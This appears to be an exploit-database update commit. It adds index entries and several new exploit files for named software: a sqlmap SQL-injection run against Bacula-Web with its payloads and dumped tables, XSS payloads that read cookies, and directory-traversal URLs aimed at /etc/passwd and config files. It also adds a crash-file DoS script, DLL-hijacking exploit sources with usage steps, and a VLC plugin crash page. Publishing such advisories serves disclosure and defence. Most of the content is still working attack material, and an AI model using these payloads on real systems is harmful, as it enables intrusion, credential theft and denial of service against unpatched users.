Updated 10_05_2014

files.csv

@@ -31378,6 +31378,7 @@ id,file,description,date,author,platform,type,port
 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0
 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0
 34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0
+34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80
 34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80
 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
 34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80
@@ -31393,3 +31394,14 @@ id,file,description,date,author,platform,type,port
 34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,metasploit,linux,remote,7426
 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80
+34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
+34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
+34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plug-in Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
+34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross Site Scripting Vulnerability",2009-07-15,Moudi,php,webapps,0
+34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service Vulnerability",2010-10-19,Sweet,windows,dos,0
+34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal Vulnerability",2009-08-27,Inj3ct0r,php,webapps,0
+34874,platforms/php/webapps/34874.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps,0
+34875,platforms/php/webapps/34875.txt,"QuarkMail 'tf' Parameter Directory Traversal Vulnerability",2009-08-28,Securitylab.ir,php,webapps,0
+34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0
+34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 'search.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
+34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 'gamelist.php' Cross Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0

platforms/php/webapps/34851.txt

@@ -0,0 +1,84 @@
+bacula-web 5.2.10 vulnerability
+
+Bacula-web is an web base application that provide you a summarized view all of the jobs bacula-director.
+
+title : Bacula-web 5.2.10
+godork : "jobid=" bacula-web
+
+
+vulnerability :
++ Sql injection 
+	example : http://target.com/bacula-web/joblogs.php?jobid=99'
+PoC : 
+
+
+		@BlackCyber:/media/data/sqlmap$ python sqlmap.py -u "http://localhost/bacula-web-5.2.10/joblogs.php?jobid=20874" -D bacula --tables --dbms=mysql --level 3 --risk 3 --threads 5 --random-agent
+		
+		    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
+		    http://sqlmap.org
+		
+		[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+		
+		[*] starting at 23:25:45
+		
+		[23:25:45] [INFO] fetched random HTTP User-Agent header from file '/media/data/sqlmap/txt/user-agents.txt': Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 Chrome/2.0.172.6 Safari/530.7
+		[23:25:46] [INFO] testing connection to the target URL
+		sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
+		---
+		Place: GET
+		Parameter: jobid
+		    Type: boolean-based blind
+		    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
+		    Payload: jobid=20874' RLIKE (SELECT (CASE WHEN (4767=4767) THEN 20874 ELSE 0x28 END)) AND 'aVuC'='aVuC
+		
+		    Type: error-based
+		    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+		    Payload: jobid=20874' AND (SELECT 8355 FROM(SELECT COUNT(*),CONCAT(0x7164667171,(SELECT (CASE WHEN (8355=8355) THEN 1 ELSE 0 END)),0x7162666371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dams'='dams
+		
+		    Type: UNION query
+		    Title: MySQL UNION query (NULL) - 4 columns
+		    Payload: jobid=20874' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7164667171,0x7950756c6975654b5356,0x7162666371)#
+		---
+		[23:25:47] [INFO] testing MySQL
+		[23:25:48] [WARNING] reflective value(s) found and filtering out
+		[23:25:48] [INFO] confirming MySQL
+		[23:25:50] [INFO] the back-end DBMS is MySQL
+		web server operating system: Linux Debian 6.0 (squeeze)
+		web application technology: PHP 5.3.3, Apache 2.2.16
+		back-end DBMS: MySQL >= 5.0.0
+		[23:25:50] [INFO] fetching tables for database: 'bacula'
+		Database: bacula
+		[24 tables]
+		+----------------+
+		| BaseFiles      |
+		| CDImages       |
+		| Client         |
+		| Counters       |
+		| Device         |
+		| File           |
+		| FileSet        |
+		| Filename       |
+		| Job            |
+		| JobHisto       |
+		| JobMedia       |
+		| Location       |
+		| LocationLog    |
+		| Log            |
+		| Media          |
+		| MediaType      |
+		| PathHierarchy  |
+		| PathVisibility |
+		| Pool           |
+		| Status         |
+		| Storage        |
+		| UnsavedFiles   |
+		| Path           |
+		| Version        |
+		+----------------+
+
+Affected version :
+bacula-web 5.2.10
+links vulnerable http://www.bacula-web.org/download/articles/bacula-web-release-5210.html?file=files/bacula-web.org/downloads/bacula-web-5.2.10.tgz
+
++ Credits :
+all of pemancing ghalau.... /^wishnusakti

platforms/php/webapps/34871.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44212/info
+
+FormXP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FormXP 2007 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forms/survey_result.php?sid=1>&#039;><ScRiPt%20%0a%0d>alert(407605250012)%3B</ScRiPt>

platforms/php/webapps/34873.txt

@@ -0,0 +1,11 @@
+source:  http://www.securityfocus.com/bid/44223/info
+
+Wap-motor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Versions prior to Wap-motor 18.1 are vulnerable. 
+
+http://www.example.com/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif
+http://www.example.com/gallery/gallery.php?image=%00../../template/config.php%00.gif
+http://www.example.com/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif 

platforms/php/webapps/34874.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/44225/info
+
+SkyBlueCanvas is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SkyBlueCanvas 1.1 r237 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS
+http://www.example.com/skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtyp e=">XSS
+http://www.example.com/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=e ditpage&id=" onfocus=alert(0) >
+http://www.example.com/skybluecanvas/admin.php?mgroup=pictures&mgr=media&dir='XSS

platforms/php/webapps/34875.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/44226/info
+
+QuarkMail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. 
+
+http://www.example.com/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes 

platforms/php/webapps/34876.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/44229/info
+
+E-Gold Game Series: Pirates of The Caribbean is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/demo/caribbean/?y=1 and 1=1&x=1 TRUE
+http://www.example.com/demo/caribbean/?y=1 and 1=2&x=1 FALSE 

platforms/php/webapps/34877.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/44237/info
+
+DigiOz Guestbook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+DigiOz Guestbook 1.7.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/guestbook/search.php
+Put: "><script>alert(document.cookie);</script>

platforms/php/webapps/34878.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44238/info
+
+StandAloneArcade is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+StandAloneArcade 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/demo/gamelist.php?cat=1</title><ScRiPt%20%0a%0d>alert(405750665179)%3B</ScRiPt>

platforms/windows/dos/34872.py

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/44220/info
+
+MASS PLAYER is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users.
+
+MASS PLAYER 2.1 is vulnerable; other versions may also be affected. 
+
+#Exploit Title :MASS PLAYER 2.1 Denial of service vulnerability
+#Software : MASS PLAYER 2.1
+#Software link :http://sourceforge.net/projects/massmusicplayer/
+#Autor : Sweet
+#Email : charif38@hotmail.fr
+#Date  : 19/10/2010
+#Software version : 2.1
+#Tested on : WinXP sp3 ENG
+#!/usr/bin/python
+#thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P  , inj3ct0r.com ,  exploit-db.com, packetstormsecurity.org, http://ha.ckers.org
+#et 1,2,3 viva L'Algerie
+outfile="crash.mp3"
+junk="\x41" * 7000
+FILE=open(outfile, "w")
+FILE.write(junk)
+FILE.close()

platforms/windows/remote/34868.c

@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/44198/info
+
+Phoenix Project Manager is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+Phoenix Project Manager 2.1.0.8 is vulnerable; other versions may also be affected. 
+
+===================================================
+Phoenix DLL Hijacking Exploit (wbtrv32.dll)
+===================================================
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1               #########################################              1
+0               I'm anT!-Tr0J4n member from Inj3ct0r Team              1
+1               #########################################              0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+ 
+
+/*
+#Phoenix DLL Hijacking Exploit (wbtrv32.dll)
+#Author    :   anT!-Tr0J4n
+#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends
+#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
+#Software :   http://www.phoenixcpm.com/
+#Tested on:   Windows? XP sp3
+#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com $ http://0xr00t.com
+
+
+==========================
+How  TO use : Compile and rename to  wbtrv32.dll  , create a file in the same dir with one of the following extensions.
+check the result > Hack3d    
+==========================
+
+
+# wbtrv32.dll(code)
+*/
+ 
+#include "stdafx.h"
+ 
+void init() {
+MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003);
+}
+ 
+ 
+BOOL APIENTRY DllMain( HANDLE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+ )
+{
+    switch (ul_reason_for_call)
+{
+case DLL_PROCESS_ATTACH:
+ init();break;
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+break;
+    }
+    return TRUE;
+}
+
+============================================
+
+special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
+
+=============================================

platforms/windows/remote/34869.c

@@ -0,0 +1,98 @@
+source: http://www.securityfocus.com/bid/44205/info
+
+Cool iPhone Ringtone Maker is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+Cool iPhone Ringtone Maker 2.2.3 is vulnerable; other versions may also be affected. 
+
+===================================================
+Cool Iphone Ringtone DLL Hijacking Exploit (dwmapi.dll)
+===================================================
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1               #########################################              1
+0               I'm anT!-Tr0J4n member from Inj3ct0r Team              1
+1               #########################################              0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+ 
+
+
+/*
+#Cool Iphone Ringtone DLL Hijacking Exploit (dwmapi.dll)
+
+#Author    :   anT!-Tr0J4n
+
+#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends
+
+#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
+
+#Software :   http://www.coolrecordedit.com
+
+#Version    :   2.2.3 
+
+#Tested on:   Windows? XP sp3
+
+#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com
+
+
+==========================
+How  TO use : Compile and rename to  dwmapi.dll , create a file in the same dir with one of the following extensions.
+
+ check the result > Hack3d    
+         
+==========================
+
+
+# dwmapi.dll(code)
+*/
+ 
+ 
+#include <windows.h>
+#define DLLIMPORT __declspec (dllexport)
+
+DLLIMPORT void  DwmDefWindowProc() { evil(); }
+DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
+DLLIMPORT void  DwmEnableComposition() { evil(); }
+DLLIMPORT void  DwmEnableMMCSS() { evil(); }
+DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
+DLLIMPORT void  DwmGetColorizationColor() { evil(); }
+DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
+DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
+DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
+DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
+DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
+DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
+DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
+DLLIMPORT void  DwmSetPresentParameters() { evil(); }
+DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
+DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
+DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }
+
+int evil()
+{
+  WinExec("calc", 0);
+  exit(0);
+  return 0;
+}
+
+
+
+============================================
+
+special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
+
+=============================================

platforms/windows/remote/34870.html

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/44211/info
+
+VLC media player is prone to a remote code-execution vulnerability.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+VLC media player 1.1.4 is vulnerable; other versions may also be affected. 
+
+ <html>  
+   <body onload="setTimeout('location.reload()', 100);">
+     <embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
+   </body>
+ </html>